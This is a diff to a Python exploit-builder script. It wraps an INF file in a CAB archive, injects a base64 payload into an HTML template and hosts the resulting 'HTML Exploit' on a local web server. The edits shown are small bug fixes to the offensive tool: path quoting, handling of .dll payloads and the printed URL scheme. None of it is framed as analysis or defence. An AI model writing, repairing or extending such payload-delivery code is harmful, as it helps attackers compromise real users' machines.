|
|
|
@ -68,10 +68,12 @@ def make_ddf(ddf_file: Path, cab_file: Path, inf_file: Path): |
|
|
|
|
.Set MaxCabinetSize=0 |
|
|
|
|
.Set MaxDiskFileCount=0 |
|
|
|
|
.Set MaxDiskSize=0 |
|
|
|
|
{inf_file.absolute()}""") |
|
|
|
|
"{inf_file.absolute()}" |
|
|
|
|
""") |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def execute_cmd(cmd, execute_from=None): |
|
|
|
|
print(cmd) |
|
|
|
|
try: |
|
|
|
|
subprocess.check_output( |
|
|
|
|
cmd, |
|
|
|
@ -326,7 +328,7 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False, |
|
|
|
|
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}") |
|
|
|
|
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit)) |
|
|
|
|
content = content.replace('<BASE64_DATA_HERE>', b64_payload) |
|
|
|
|
content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) |
|
|
|
|
content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) if exploit != ".dll" else "" |
|
|
|
|
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit)) |
|
|
|
|
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1]) |
|
|
|
|
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2]) |
|
|
|
@ -436,6 +438,7 @@ if __name__ == '__main__': |
|
|
|
|
|
|
|
|
|
port = 80 |
|
|
|
|
ip = "127.0.0.1" |
|
|
|
|
scheme = "" |
|
|
|
|
try: |
|
|
|
|
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1].split(":")[0] |
|
|
|
|
if scheme == "http": |
|
|
|
@ -462,7 +465,7 @@ if __name__ == '__main__': |
|
|
|
|
traceback.print_exc() |
|
|
|
|
exit(1) |
|
|
|
|
if args.host and html: |
|
|
|
|
print(f'[*] Hosting HTML Exploit at {ip}:{port}/{html}...') |
|
|
|
|
print(f'[*] Hosting HTML Exploit at {scheme}://{ip}:{port}/{html}...') |
|
|
|
|
start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv")) |
|
|
|
|
if args.test: |
|
|
|
|
if os.path.splitext(args.payload)[1] != ".wsf": |
|
|
|
|